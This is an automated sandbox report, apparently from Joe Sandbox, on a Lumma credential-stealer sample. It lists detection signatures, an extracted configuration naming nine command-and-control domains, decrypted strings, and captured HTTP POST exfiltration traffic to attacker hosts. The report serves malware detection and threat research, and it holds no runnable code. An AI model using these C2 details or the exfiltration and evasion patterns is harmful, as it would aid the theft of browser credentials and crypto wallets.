Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8ZVMneG.exe

Overview

General Information

Sample name:8ZVMneG.exe
Analysis ID:1578702
MD5:e8af4d0d0b47ac68d762b7f288ae8e6e
SHA1:1d65f31526cc20ab41d6b1625d6674d7f13e326c
SHA256:b83449768e7af68867c8bc42b19ff012722d88ea66aef69df48661e63e0eb15e
Tags:exeuser-lontze7
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 8ZVMneG.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
    • conhost.exe (PID: 1916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 8ZVMneG.exe (PID: 2144 cmdline: "C:\Users\user\Desktop\8ZVMneG.exe" MD5: E8AF4D0D0B47AC68D762B7F288AE8E6E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "bellflamre.click", "effecterectz.xyz", "immureprech.biz", "diffuculttan.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: 8ZVMneG.exe PID: 2144JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: 8ZVMneG.exe PID: 2144JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 8ZVMneG.exe PID: 2144JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:04.762697+010020283713Unknown Traffic192.168.2.649708178.62.201.34443TCP
              2024-12-20T07:04:08.073287+010020283713Unknown Traffic192.168.2.649710178.62.201.34443TCP
              2024-12-20T07:04:11.747273+010020283713Unknown Traffic192.168.2.64972123.55.153.106443TCP
              2024-12-20T07:04:14.477255+010020283713Unknown Traffic192.168.2.649730104.21.66.86443TCP
              2024-12-20T07:04:16.977941+010020283713Unknown Traffic192.168.2.649737104.21.66.86443TCP
              2024-12-20T07:04:20.251562+010020283713Unknown Traffic192.168.2.649748104.21.66.86443TCP
              2024-12-20T07:04:22.408919+010020283713Unknown Traffic192.168.2.649754104.21.66.86443TCP
              2024-12-20T07:04:24.648073+010020283713Unknown Traffic192.168.2.649760104.21.66.86443TCP
              2024-12-20T07:04:27.199008+010020283713Unknown Traffic192.168.2.649765104.21.66.86443TCP
              2024-12-20T07:04:29.656807+010020283713Unknown Traffic192.168.2.649771104.21.66.86443TCP
              2024-12-20T07:04:33.207297+010020283713Unknown Traffic192.168.2.649781104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:05.330048+010020546531A Network Trojan was detected192.168.2.649708178.62.201.34443TCP
              2024-12-20T07:04:08.643870+010020546531A Network Trojan was detected192.168.2.649710178.62.201.34443TCP
              2024-12-20T07:04:15.538055+010020546531A Network Trojan was detected192.168.2.649730104.21.66.86443TCP
              2024-12-20T07:04:17.761204+010020546531A Network Trojan was detected192.168.2.649737104.21.66.86443TCP
              2024-12-20T07:04:33.968807+010020546531A Network Trojan was detected192.168.2.649781104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:05.330048+010020498361A Network Trojan was detected192.168.2.649708178.62.201.34443TCP
              2024-12-20T07:04:08.643870+010020498361A Network Trojan was detected192.168.2.649710178.62.201.34443TCP
              2024-12-20T07:04:15.538055+010020498361A Network Trojan was detected192.168.2.649730104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:17.761204+010020498121A Network Trojan was detected192.168.2.649737104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:08.073287+010020582151Domain Observed Used for C2 Detected192.168.2.649710178.62.201.34443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:04.762697+010020582231Domain Observed Used for C2 Detected192.168.2.649708178.62.201.34443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:09.691347+010020582101Domain Observed Used for C2 Detected192.168.2.6556331.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:01.704512+010020582121Domain Observed Used for C2 Detected192.168.2.6645631.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:05.333755+010020582141Domain Observed Used for C2 Detected192.168.2.6511101.1.1.153UDP
              2024-12-20T07:04:06.343594+010020582141Domain Observed Used for C2 Detected192.168.2.6511101.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:09.249702+010020582161Domain Observed Used for C2 Detected192.168.2.6613451.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:09.024667+010020582181Domain Observed Used for C2 Detected192.168.2.6496641.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:08.719711+010020582201Domain Observed Used for C2 Detected192.168.2.6598001.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:02.024946+010020582221Domain Observed Used for C2 Detected192.168.2.6580221.1.1.153UDP
              2024-12-20T07:04:03.018352+010020582221Domain Observed Used for C2 Detected192.168.2.6580221.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:09.910772+010020582261Domain Observed Used for C2 Detected192.168.2.6548621.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:09.472443+010020582361Domain Observed Used for C2 Detected192.168.2.6615301.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:27.960398+010020480941Malware Command and Control Activity Detected192.168.2.649765104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:04.765168+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.649708TCP
              2024-12-20T07:04:08.074752+010028225211Domain Observed Used for C2 Detected178.62.201.34443192.168.2.649710TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T07:04:12.667635+010028586661Domain Observed Used for C2 Detected192.168.2.64972123.55.153.106443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "sordid-snaked.cyou", "awake-weaves.cyou", "deafeninggeh.biz", "wrathful-jammy.cyou", "bellflamre.click", "effecterectz.xyz", "immureprech.biz", "diffuculttan.xyz"], "Build id": "LPnhqo--nbgnxdlxdnyo"}
              Multi AV Scanner detection for submitted file
              Source: 8ZVMneG.exeVirustotal: Detection: 65%Perma Link
              Source: 8ZVMneG.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.5% probability
              Machine Learning detection for sample
              Source: 8ZVMneG.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: bellflamre.click
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000003.00000002.2484060746.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LPnhqo--nbgnxdlxdnyo
              Source: 8ZVMneG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49760 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49781 version: TLS 1.2
              Source: 8ZVMneG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EDD2A7 FindFirstFileExW,0_2_00EDD2A7
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EDD358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EDD358

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.6:64563 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.6:58022 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.6:51110 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.6:49708 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.6:55633 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.6:54862 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49708
              Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.6:49710 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 178.62.201.34:443 -> 192.168.2.6:49710
              Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.6:61530 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.6:59800 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.6:49664 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.6:61345 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49737 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49708 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49730 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49737 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49708 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49721 -> 23.55.153.106:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49781 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49765 -> 104.21.66.86:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: debonairnukk.xyz
              Source: Malware configuration extractorURLs: sordid-snaked.cyou
              Source: Malware configuration extractorURLs: awake-weaves.cyou
              Source: Malware configuration extractorURLs: deafeninggeh.biz
              Source: Malware configuration extractorURLs: wrathful-jammy.cyou
              Source: Malware configuration extractorURLs: bellflamre.click
              Source: Malware configuration extractorURLs: effecterectz.xyz
              Source: Malware configuration extractorURLs: immureprech.biz
              Source: Malware configuration extractorURLs: diffuculttan.xyz
              Performs DNS queries to domains with low reputation
              Source: DNS query: effecterectz.xyz
              Source: DNS query: diffuculttan.xyz
              Source: DNS query: debonairnukk.xyz
              Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
              Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
              Source: Joe Sandbox ViewIP Address: 178.62.201.34 178.62.201.34
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 178.62.201.34:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 23.55.153.106:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49748 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49754 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49760 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49765 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49771 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49781 -> 104.21.66.86:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=C5PLJO8RR7LUD8CMHBIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12872Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UB6YY78GPNR7GMOC0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15106Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ICQ9J4SUMK0W7VEBGUYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19976Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1NBWOHGWMH0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1184Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6DZ4WE0ATJK8ZMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587856Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: lev-tolstoi.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: 8ZVMneG.exe, 00000003.00000003.2402934236.00000000013FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: //www.youtube.com https://www.google.com equals www.youtube.com (Youtube)
              Source: 8ZVMneG.exe, 00000003.00000003.2272475504.0000000001403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=9141f4cafee052551e41627d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; 